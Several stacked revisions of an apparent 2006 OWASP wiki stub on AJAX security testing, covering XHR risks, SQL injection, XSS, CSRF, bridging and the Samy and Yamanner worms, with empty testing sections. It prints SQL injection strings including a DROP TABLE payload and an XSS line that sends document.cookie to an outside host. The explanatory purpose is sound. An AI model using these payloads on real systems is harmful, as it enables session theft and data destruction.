'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T20:49:03Z

Anushshetty: /* Introduction */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-
in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T20:32:42Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T20:12:29Z

Anushshetty: /* Major Attacks */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T20:11:15Z

Anushshetty: /* Recent Attacks */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site 
In Samy attack,the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T20:10:35Z

Anushshetty: /* Recent Attacks */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
